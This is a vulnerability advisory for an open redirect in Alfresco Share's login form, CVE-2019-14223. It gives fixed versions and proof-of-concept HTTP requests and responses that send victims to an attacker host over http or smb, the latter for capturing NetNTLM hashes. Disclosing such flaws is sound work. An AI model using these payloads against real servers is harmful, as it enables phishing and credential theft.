CVE-2019-14223: Open Redirect in Alfresco Share
The Alfresco Share application, versions below 5.2.6, 6.0.N and 6.1.N, is vulnerable to an Open Redirect attack via a crafted POST request.
By manipulation the "failure" parameter an attacker can redirect a victim to a malicious website over any protocol the attacker desires (Ex. http, https, ftp, smb, etc.).
Fixed Versions
| Fix Version |
|---|
| 5.2.6 |
| 6.0.N |
| 6.1.N |
Redirect Over the Same Protocol
This is a redirect over the same protocol used to access the login page (http/https) and can be used to redirect the client to a malicious website used for phishing or that targets the browser itself.
- Request:
POST /share/page/dologin HTTP/1.1
Host: <TARGET_IP>:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
success=%2Fshare%2Fpage%2F&failure=:\\mal.hexor:4444\mal\evil.html&username=baduser&password=badpass
- Response:
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: JSESSIONID=71***TRUNCATED***53; Path=/share; Secure; HttpOnly
Location: \\mal.hexor:4444\mal\evil.html
Content-Length: 0
Date: Mon, 13 May 2019 14:27:47 GMT
Redirect Over Specific Protocol (SMB, FTP, etc.)
In this case the "smb" protocol can be used in order to potentially exfiltrate the victims NetNTLM hash.
- Request:
POST /share/page/dologin HTTP/1.1
Host: <TARGET_IP>:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
success=%2Fshare%2Fpage%2F&failure=:smb:\\mal.hexor:4444\mal\evil.html&username=baduser&password=badpass
- Response:
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: JSESSIONID=2C***TRUNCATED***DF; Path=/share; Secure; HttpOnly
Location: smb:\\mal.hexor:4444\mal\evil.html
Content-Length: 0
Date: Mon, 13 May 2019 15:23:34 GMT